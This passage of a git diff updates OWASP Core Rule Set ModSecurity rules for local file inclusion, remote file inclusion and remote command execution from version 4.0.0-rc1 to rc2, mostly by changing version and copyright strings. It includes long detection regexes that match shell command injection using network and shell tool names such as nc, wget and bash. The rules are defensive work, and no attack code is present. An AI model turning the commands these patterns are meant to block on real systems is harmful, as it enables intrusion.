     SecRule TX:1 "!@rx ^(?:(?:\*|[^!-\"\(-\),/:-\?\[-\]\{\}]+)/(?:\*|[^!-\"\(-\),/:-\?\[-\]\{\}]+)|\*)(?:[\s\v]*;[\s\v]*(?:charset[\s\v]*=[\s\v]*\"?(?:iso-8859-15?|utf-8|windows-1252)\b\"?|(?:[^\s\v -\"\(-\),/:-\?\[-\]c\{\}]|c(?:[^!-\"\(-\),/:-\?\[-\]h\{\}]|h(?:[^!-\"\(-\),/:-\?\[-\]a\{\}]|a(?:[^!-\"\(-\),/:-\?\[-\]r\{\}]|r(?:[^!-\"\(-\),/:-\?\[-\]s\{\}]|s(?:[^!-\"\(-\),/:-\?\[-\]e\{\}]|e[^!-\"\(-\),/:-\?\[-\]t\{\}]))))))[^!-\"\(-\),/:-\?\[-\]\{\}]*[\s\v]*=[\s\v]*[^!\(-\),/:-\?\[-\]\{\}]+);?)*(?:[\s\v]*,[\s\v]*(?:(?:\*|[^!-\"\(-\),/:-\?\[-\]\{\}]+)/(?:\*|[^!-\"\(-\),/:-\?\[-\]\{\}]+)|\*)(?:[\s\v]*;[\s\v]*(?:charset[\s\v]*=[\s\v]*\"?(?:iso-8859-15?|utf-8|windows-1252)\b\"?|(?:[^\s\v -\"\(-\),/:-\?\[-\]c\{\}]|c(?:[^!-\"\(-\),/:-\?\[-\]h\{\}]|h(?:[^!-\"\(-\),/:-\?\[-\]a\{\}]|a(?:[^!-\"\(-\),/:-\?\[-\]r\{\}]|r(?:[^!-\"\(-\),/:-\?\[-\]s\{\}]|s(?:[^!-\"\(-\),/:-\?\[-\]e\{\}]|e[^!-\"\(-\),/:-\?\[-\]t\{\}]))))))[^!-\"\(-\),/:-\?\[-\]\{\}]*[\s\v]*=[\s\v]*[^!\(-\),/:-\?\[-\]\{\}]+);?)*)*$" \
@@ -63,6 +63,6 @@ SecRule MULTIPART_PART_HEADERS "@rx content-transfer-encoding:(.*)" \
     tag:'OWASP_CRS',\
     tag:'capec/272/220',\
     tag:'paranoia-level/1',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
diff --git a/rules/@owasp_crs/REQUEST-930-APPLICATION-ATTACK-LFI.conf b/rules/@owasp_crs/REQUEST-930-APPLICATION-ATTACK-LFI.conf
index e9aaf17..49df031 100644
--- a/rules/@owasp_crs/REQUEST-930-APPLICATION-ATTACK-LFI.conf
+++ b/rules/@owasp_crs/REQUEST-930-APPLICATION-ATTACK-LFI.conf
@@ -1,7 +1,7 @@
 # ------------------------------------------------------------------------
-# OWASP ModSecurity Core Rule Set ver.4.0.0-rc1
+# OWASP ModSecurity Core Rule Set ver.4.0.0-rc2
 # Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved.
-# Copyright (c) 2021-2022 Core Rule Set project. All rights reserved.
+# Copyright (c) 2021-2023 Core Rule Set project. All rights reserved.
 #
 # The OWASP ModSecurity Core Rule Set is distributed under
 # Apache Software License (ASL) version 2
@@ -24,7 +24,7 @@ SecRule REQUEST_URI_RAW|ARGS|REQUEST_HEADERS|!REQUEST_HEADERS:Referer|FILES|XML:
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
     tag:'capec/1000/255/153/126',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}',\
     setvar:'tx.lfi_score=+%{tx.critical_anomaly_score}'"
@@ -43,7 +43,7 @@ SecRule REQUEST_URI|ARGS|REQUEST_HEADERS|!REQUEST_HEADERS:Referer|FILES|XML:/* "
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
     tag:'capec/1000/255/153/126',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     multiMatch,\
     setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}',\
@@ -64,7 +64,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
     tag:'OWASP_CRS',\
     tag:'capec/1000/255/153/126',\
     tag:'PCI/6.5.4',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     setvar:'tx.lfi_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -84,7 +84,7 @@ SecRule REQUEST_FILENAME "@pmFromFile restricted-files.data" \
     tag:'OWASP_CRS',\
     tag:'capec/1000/255/153/126',\
     tag:'PCI/6.5.4',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     setvar:'tx.lfi_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -106,7 +106,7 @@ SecRule REQUEST_HEADERS:Referer|REQUEST_HEADERS:User-Agent "@pmFromFile lfi-os-f
     tag:'OWASP_CRS',\
     tag:'capec/1000/255/153/126',\
     tag:'PCI/6.5.4',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     setvar:'tx.lfi_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
diff --git a/rules/@owasp_crs/REQUEST-931-APPLICATION-ATTACK-RFI.conf b/rules/@owasp_crs/REQUEST-931-APPLICATION-ATTACK-RFI.conf
index 93bcdc8..71d0050 100644
--- a/rules/@owasp_crs/REQUEST-931-APPLICATION-ATTACK-RFI.conf
+++ b/rules/@owasp_crs/REQUEST-931-APPLICATION-ATTACK-RFI.conf
@@ -1,7 +1,7 @@
 # ------------------------------------------------------------------------
-# OWASP ModSecurity Core Rule Set ver.4.0.0-rc1
+# OWASP ModSecurity Core Rule Set ver.4.0.0-rc2
 # Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved.
-# Copyright (c) 2021-2022 Core Rule Set project. All rights reserved.
+# Copyright (c) 2021-2023 Core Rule Set project. All rights reserved.
 #
 # The OWASP ModSecurity Core Rule Set is distributed under
 # Apache Software License (ASL) version 2
@@ -24,7 +24,7 @@ SecRule ARGS "@rx ^(?i:file|ftps?|https?)://(?:\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
     tag:'capec/1000/152/175/253',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     setvar:'tx.rfi_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -43,7 +43,7 @@ SecRule QUERY_STRING|REQUEST_BODY "@rx (?i)(?:\binclude\s*\([^)]*|mosConfig_abso
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
     tag:'capec/1000/152/175/253',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     setvar:'tx.rfi_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -62,7 +62,7 @@ SecRule ARGS "@rx ^(?i:file|ftps?|https?).*?\?+$" \
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
     tag:'capec/1000/152/175/253',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     setvar:'tx.rfi_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -83,7 +83,7 @@ SecRule ARGS "@rx (?i)(?:(?:url|jar):)?(?:a(?:cap|f[ps]|ttachment)|b(?:eshare|it
     tag:'OWASP_CRS',\
     tag:'capec/1000/152/175/253',\
     tag:'paranoia-level/2',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     setvar:'tx.rfi_parameter_%{MATCHED_VAR_NAME}=.%{tx.1}',\
     chain"
@@ -105,7 +105,7 @@ SecRule REQUEST_FILENAME "@rx (?i)(?:(?:url|jar):)?(?:a(?:cap|f[ps]|ttachment)|b
     tag:'OWASP_CRS',\
     tag:'capec/1000/152/175/253',\
     tag:'paranoia-level/2',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     setvar:'tx.rfi_parameter_%{MATCHED_VAR_NAME}=.%{tx.1}',\
     chain"
diff --git a/rules/@owasp_crs/REQUEST-932-APPLICATION-ATTACK-RCE.conf b/rules/@owasp_crs/REQUEST-932-APPLICATION-ATTACK-RCE.conf
index 3bafc1b..4435f36 100644
--- a/rules/@owasp_crs/REQUEST-932-APPLICATION-ATTACK-RCE.conf
+++ b/rules/@owasp_crs/REQUEST-932-APPLICATION-ATTACK-RCE.conf
@@ -1,7 +1,7 @@
 # ------------------------------------------------------------------------
-# OWASP ModSecurity Core Rule Set ver.4.0.0-rc1
+# OWASP ModSecurity Core Rule Set ver.4.0.0-rc2
 # Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved.
-# Copyright (c) 2021-2022 Core Rule Set project. All rights reserved.
+# Copyright (c) 2021-2023 Core Rule Set project. All rights reserved.
 #
 # The OWASP ModSecurity Core Rule Set is distributed under
 # Apache Software License (ASL) version 2
@@ -9,7 +9,7 @@
 # ------------------------------------------------------------------------
 SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:932011,phase:1,pass,nolog,skipAfter:END-REQUEST-932-APPLICATION-ATTACK-RCE"
 SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:932012,phase:2,pass,nolog,skipAfter:END-REQUEST-932-APPLICATION-ATTACK-RCE"
-SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)(?:t[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?i[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?m[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?e|[\n\r;`\{]|\|\|?|&&?|\$(?:\(\(?|\{)|[<>]\(|\([\s\v]*\))[\s\v]*(?:[\$\{]|(?:[\s\v]*\(|!)[\s\v]*|[0-9A-Z_a-z]+=(?:[^\s\v]*|\$(?:.*|.*)|[<>].*|'.*'|\".*\")[\s\v]+)*[\s\v]*[\"']*(?:[\"'-\+\--9\?A-\]_a-z\|]+/)?[\"'\x5c]*(?:7[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?z(?:[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?[ar])?|a[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:(?:[bt]|w[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?[ks])[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?[\s\v&\),<>\|].*|p[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?t|r[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:[\s\v&\),<>\|].*|[jp])|s[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:[\s\v&\),<>\|].*|h))|(?:(?:b[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?z[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?z|h[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:d|u[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?p)|n[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:[cl]|e[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?t|(?:p[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?)?m)|o[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?d|u[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?l)[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?|v[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?i[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:m[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?)?)[\s\v&\),<>\|].*|c[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:[8-9][\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?9|(?:[au][\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?t|[cp])[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?[\s\v&\),<>\|].*|m[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?p|s[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?h)|d[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:[du][\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?[\s\v&\),<>\|].*|i[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?g|n[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?f)|e[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:(?:[bdx]|n[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?v)[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?[\s\v&\),<>\|].*|q[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?n)|f[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:(?:c|t[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?p)[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?[\s\v&\),<>\|].*|i|m[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?t)|g[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:(?:c[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?c[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:[&,<>\|]|(?:[\--\.0-9A-Z_a-z][\"'\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\*\-0-9\?-@_a-\{]*)?\x5c?)+[\s\v&,<>\|])|(?:e[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?m|i[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?t|o)[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?[\s\v&\),<>\|]).*|d[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?b|[hr][\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?c)|i[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:d[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?[\s\v&\),<>\|].*|p|r[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?b)|j[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:j[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?s|q)|k[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?s[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?h|l[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:(?:d[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:d[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?)?|(?:[npz]|u[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?a)[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?)[\s\v&\),<>\|].*|s)|m[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:(?:a[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?n|v)[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?[\s\v&\),<>\|].*|t[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?r)|p[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:(?:(?:a[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?x|f|h[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?p)[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?|r[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:y[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?)?)[\s\v&\),<>\|].*|d[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?b|(?:k[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?)?g|i[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:c|p[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:[&,<>\|]|(?:[\--\.0-9A-Z_a-z][\"'\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\*\-0-9\?-@_a-\{]*)?\x5c?)+[\s\v&,<>\|]).*)|s|t[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?x|x[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?z)|r[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:(?:a[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?r|c[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?p|(?:p[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?)?m)[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?[\s\v&\),<>\|].*|e[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:d[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?[\s\v&\),<>\|].*|v))|s[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:c[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?p|(?:(?:e[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?[dt]|[hu])[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?|s[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:h[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?)?)[\s\v&\),<>\|].*|g|v[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?n)|t[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:a[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:c|r[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?[\s\v&\),<>\|].*)|b[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?l|e[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?[ex]|i[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?c[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?[\s\v&\),<>\|].*|o[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?p)|w[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:3[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?m|c|h[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?o)|x[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:x[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?d|z[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?[\s\v&\),<>\|].*)|y[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?u[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?m|z[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:i[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?p|s[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?h))\b" \
